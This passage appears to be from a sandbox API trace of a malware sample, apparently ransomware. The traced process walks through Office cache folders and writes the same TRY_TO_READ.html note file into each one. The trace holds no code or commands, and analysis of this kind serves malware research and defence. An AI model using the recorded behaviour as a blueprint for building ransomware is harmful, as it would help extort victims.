lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.659] WriteFile (in: hFile=0x458, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.659] WriteFile (in: hFile=0x458, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.659] CloseHandle (hObject=0x458) returned 1 [0116.659] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.659] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0116.659] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0116.659] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328bd8 | out: hHeap=0x2e0000) returned 1 [0116.659] FindNextFileW (in: hFindFile=0x35dc98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-001A-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9765F~1")) returned 1 [0116.659] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.659] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.659] GetLastError () returned 0x0 [0116.660] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.660] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.660] GetLastError () returned 0x0 [0116.660] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0116.660] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3387c0 [0116.660] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0116.660] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3387c0 | out: hHeap=0x2e0000) returned 1 [0116.660] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328bd8 [0116.660] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e558 [0116.660] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328c60 [0116.660] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c38 [0116.660] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c48 [0116.660] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.660] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ce8 [0116.660] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.660] GetLastError () returned 0x0 [0116.660] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.660] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328ce8 | out: hHeap=0x2e0000) returned 1 [0116.660] GetLastError () returned 0x0 [0116.660] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0116.660] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0116.662] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0116.662] WriteFile (in: hFile=0x458, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.663] WriteFile (in: hFile=0x458, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.663] WriteFile (in: hFile=0x458, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.663] CloseHandle (hObject=0x458) returned 1 [0116.663] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.663] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0116.664] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0116.664] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328c60 | out: hHeap=0x2e0000) returned 1 [0116.664] FindNextFileW (in: hFindFile=0x35dc98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-001B-0409-1000-0000000FF1CE}-C", cAlternateFileName="{94E50~1")) returned 1 [0116.664] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.664] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.664] GetLastError () returned 0x0 [0116.664] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.664] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.664] GetLastError () returned 0x0 [0116.664] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3387c0 [0116.664] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0116.664] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3387c0 | out: hHeap=0x2e0000) returned 1 [0116.664] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0116.664] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328c60 [0116.664] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e508 [0116.664] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ce8 [0116.664] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c38 [0116.664] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c48 [0116.664] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.664] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328d70 [0116.664] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.664] GetLastError () returned 0x0 [0116.664] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.664] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328d70 | out: hHeap=0x2e0000) returned 1 [0116.664] GetLastError () returned 0x0 [0116.664] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0116.664] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0116.667] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0116.667] WriteFile (in: hFile=0x458, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.668] WriteFile (in: hFile=0x458, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.668] WriteFile (in: hFile=0x458, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.668] CloseHandle (hObject=0x458) returned 1 [0116.668] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.668] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0116.668] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0116.668] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328ce8 | out: hHeap=0x2e0000) returned 1 [0116.668] FindNextFileW (in: hFindFile=0x35dc98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-002C-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92787~1")) returned 1 [0116.668] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.668] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.668] GetLastError () returned 0x0 [0116.669] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.669] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.669] GetLastError () returned 0x0 [0116.669] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0116.669] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3387c0 [0116.669] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0116.669] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3387c0 | out: hHeap=0x2e0000) returned 1 [0116.669] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ce8 [0116.669] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e4b8 [0116.669] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328d70 [0116.669] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c38 [0116.669] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c48 [0116.669] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.669] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328df8 [0116.669] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.669] GetLastError () returned 0x0 [0116.669] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.669] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328df8 | out: hHeap=0x2e0000) returned 1 [0116.669] GetLastError () returned 0x0 [0116.669] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0116.669] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0116.671] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0116.671] WriteFile (in: hFile=0x458, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.672] WriteFile (in: hFile=0x458, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.672] WriteFile (in: hFile=0x458, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.672] CloseHandle (hObject=0x458) returned 1 [0116.672] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.673] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0116.673] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0116.673] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328d70 | out: hHeap=0x2e0000) returned 1 [0116.673] FindNextFileW (in: hFindFile=0x35dc98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0043-0409-1000-0000000FF1CE}-C", cAlternateFileName="{95310~1")) returned 1 [0116.673] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.673] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.673] GetLastError () returned 0x0 [0116.673] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.673] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.673] GetLastError () returned 0x0 [0116.673] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3387c0 [0116.673] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0116.673] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3387c0 | out: hHeap=0x2e0000) returned 1 [0116.673] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0116.673] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328d70 [0116.673] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e468 [0116.673] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328df8 [0116.673] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c38 [0116.673] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c48 [0116.673] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.673] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328e80 [0116.673] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.673] GetLastError () returned 0x0 [0116.673] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.673] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328e80 | out: hHeap=0x2e0000) returned 1 [0116.673] GetLastError () returned 0x0 [0116.673] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0116.673] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0116.676] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0116.676] WriteFile (in: hFile=0x458, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.677] WriteFile (in: hFile=0x458, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.677] WriteFile (in: hFile=0x458, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.677] CloseHandle (hObject=0x458) returned 1 [0116.677] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.677] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0116.677] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0116.677] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328df8 | out: hHeap=0x2e0000) returned 1 [0116.677] FindNextFileW (in: hFindFile=0x35dc98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0044-0409-1000-0000000FF1CE}-C", cAlternateFileName="{91454~1")) returned 1 [0116.677] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.677] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.677] GetLastError () returned 0x0 [0116.677] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.677] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.677] GetLastError () returned 0x0 [0116.677] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0116.677] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3387c0 [0116.678] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0116.678] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3387c0 | out: hHeap=0x2e0000) returned 1 [0116.678] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328df8 [0116.678] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e418 [0116.678] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328e80 [0116.678] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c38 [0116.678] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c48 [0116.678] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.678] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f08 [0116.678] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.678] GetLastError () returned 0x0 [0116.678] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.678] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328f08 | out: hHeap=0x2e0000) returned 1 [0116.678] GetLastError () returned 0x0 [0116.678] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0116.678] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0116.680] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0116.680] WriteFile (in: hFile=0x458, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.681] WriteFile (in: hFile=0x458, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.681] WriteFile (in: hFile=0x458, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.681] CloseHandle (hObject=0x458) returned 1 [0116.681] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.681] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0116.681] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0116.681] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328e80 | out: hHeap=0x2e0000) returned 1 [0116.681] FindNextFileW (in: hFindFile=0x35dc98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0054-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9EA85~1")) returned 1 [0116.681] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.682] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.682] GetLastError () returned 0x0 [0116.682] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.682] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.682] GetLastError () returned 0x0 [0116.682] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3387c0 [0116.682] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0116.682] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3387c0 | out: hHeap=0x2e0000) returned 1 [0116.682] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0116.682] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328e80 [0116.682] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e3c8 [0116.682] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f08 [0116.682] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c38 [0116.682] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c48 [0116.682] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.682] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f90 [0116.682] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.682] GetLastError () returned 0x0 [0116.682] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.682] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, 